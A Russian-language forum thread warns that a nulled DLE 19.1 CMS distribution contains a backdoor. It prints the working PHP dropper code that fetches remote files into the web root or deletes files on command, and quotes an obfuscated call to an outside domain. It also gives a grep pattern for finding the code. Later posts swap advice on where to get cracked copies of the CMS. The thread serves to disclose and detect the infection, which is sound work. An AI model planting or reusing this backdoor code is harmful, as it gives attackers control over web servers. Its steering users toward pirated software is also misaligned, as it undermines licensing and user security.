Что нового

Предостережение! DLE 19.1 nulled

Oleksii Panchenko

Посетитель
Регистрация
18 Фев 2024
Сообщения
106
Реакции
38
Если кто скачал из этого сайта себе движок DLE из этого источника:
рекомендую заглянуть себе в файл : engine/modules/serch.php
Eсть backdoor. Это тот же заражённый фрагмент, который мы уже разобрали.
Критичные вставки:
Код:
$serch_id  = 'eb516e7d7a6462a6d531ec65dcf1d599';
Код:
$_err = "_stop";
$array_ = @strtoupper ($_err[0].$_err[5].$_err[4].$_err[3].$_err[1].$_err[2]);
И основной вредоносный блок:
Код:
if ( @md5(${$array_}['captchas'])==$serch_id ) { print "serch_work";
        $where_serch = $_SERVER['DOCUMENT_ROOT'].${$array_}['pathik'];

    if ( isset(${$array_}['unl']) ){ 
    @unlink($where_serch); exit();} @copy('http://'.${$array_}['fail'].'/test.txt', $where_serch);
    

    if ((@function_exists('curl_init')) and ((!file_exists($where_serch)) or (@filesize($where_serch)<'1'))) {
        $ch = @curl_init(); curl_setopt( $ch, CURLOPT_URL,
              'http://'.${$array_}['fail'].'/test.txt');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );curl_setopt($ch, CURLOPT_TIMEOUT, 25);
        $fp = @fopen($where_serch, 'w'); curl_setopt ($ch, CURLOPT_FILE, $fp); @curl_exec($ch); curl_close($ch); fclose($fp);
    }}
Что он делает: через замаскированный $_POST принимает параметры, скачивает удалённый файл test.txt с чужого домена и записывает его в путь внутри DOCUMENT_ROOT. Также умеет удалять указанный файл через unlink().

Это не штатный DLE-код. Это полноценный загрузчик файлов на сервер.
Но правильнее не чистить руками, а заменить весь engine/modules/search.php на оригинальный чистый файл из официального архива DLE 19.1. Если такой же фрагмент есть в двух копиях файла, значит заражение могло быть массовым или файл копировался уже заражённым.


После замены сразу запусти по сайту:
Код:
grep -RInEi "serch_work|captchas|pathik|_stop|test\.txt|\$\{\$array_\}" . 2>/dev/null
Если что-то найдёт — это кандидаты на такие же закладки.
 
Аналогичная ситуация! если кто качал с этого источника:
Тот же файл engine/modules/serch.php
 
По этому нужно скачать именно с сайта top.skripters.biz
 
Такого файла как serch.php там и не должно существовать, правильное название файла движка - search.php
 
У меня опечатка спасибо за внимательность.
 
Подтверждаю, тоже обнаружил данный код у себя, огромная благодарность автору.
 
Запульнул в ИИ касаемо кода в search.php, вот один из его ответов:

"Скан уже нашёл не только search.php, но и подозрительный фрагмент в engine/modules/feedback.php: там замаскированный base64_decode и обращение к time-zone.cc/time.php?.... Это тоже выглядит как закладка, поэтому очищу оба места: search.php и feedback.php, с бэкапом перед правкой."

Хз, что именно ему там не понравилось, но может и там есть что-то непорядочное.
 
Запульнул в ИИ касаемо кода в search.php, вот один из его ответов:

"Скан уже нашёл не только search.php, но и подозрительный фрагмент в engine/modules/feedback.php: там замаскированный base64_decode и обращение к time-zone.cc/time.php?.... Это тоже выглядит как закладка, поэтому очищу оба места: search.php и feedback.php, с бэкапом перед правкой."

Хз, что именно ему там не понравилось, но может и там есть что-то непорядочное.
Все зависит от того как вы обновлялись!
 
Вопрос зачем юзать нулл? Уверен в проекте заплати за лицензию..
 
При выходе 19.1 так же писал что в dleshka.org добавлен файл engine\classes\yandex.class.php, это только при быстрой проверке файлов было замечено.
Ну и прочие неприятности, например, в engine\inc\addnews.php:
Код:
$path_addnews = $config['http_home_url'];
    $deprecate = "time";$deprecate = "ht"."tps:/"."/".$deprecate."-"."zone".".cc/"."time.p"."hp?times="."19."."1_yc_".$path_addnews;
По всем правкам — 42 изменения относительно оригинала.
 
Что бы протестировать модули хаки. Никто на основном не тестирует.
почему никто не тестирует, что ты несешь?))) качаешь у лешего https://top.skripters.biz/threads/50677/ , активируешь в пару кликов и свой нулл с чистым кодом. Кстати Лешему отдельное спасибо за сборку версий в одном месте! Для тестинга прям огонь, всегда пользуюсь!
 
Так где в итоге брать нулик ? Чтобы без всякой заразы было..
 
По этому нужно скачать именно с сайта top.skripters.biz
Ну кстати да, вы небыли пока что замечены в таких подставах, мое почтение)), хотя последний раз сверял ваш архив с оригинальным еще на dle 17.3.
 
Аналогичная ситуация! если кто качал с этого источника:
Тот же файл engine/modules/serch.php
Здравствуйте

Если вы скачали файл с моего сайта, почему не предупредили меня об этом в личных сообщениях? Я не знал, что там был вредоносный код. В любом случае, я принимаю к сведению то, о чём вы сообщили
 
Здравствуйте

Если вы скачали файл с моего сайта, почему не предупредили меня об этом в личных сообщениях? Я не знал, что там был вредоносный код. В любом случае, я принимаю к сведению то, о чём вы сообщили
Я считаю, что вы как администратор должны перепроверить, что публикуете!В следующий раз дам знать!
 
Верх